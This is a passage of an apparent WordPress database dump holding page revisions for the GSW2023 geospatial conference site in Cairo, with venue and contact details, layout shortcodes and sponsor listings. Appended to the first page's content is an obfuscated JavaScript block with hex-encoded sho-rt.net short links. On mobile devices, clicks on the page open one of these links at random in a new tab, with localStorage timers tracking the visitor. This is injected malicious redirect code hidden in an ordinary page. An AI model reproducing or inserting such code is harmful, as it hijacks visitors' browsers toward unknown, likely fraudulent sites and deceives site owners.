style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-25 16:26:19','2023-06-25 16:26:19','',3066,'https://gsw2023.com/?p=4826',0,'revision','',0),
(4827,4,'2023-06-25 16:27:08','2023-06-25 16:27:08','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1687571540500{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687710061920{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row full_height=\"yes\" css=\".vc_custom_1687710422063{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" 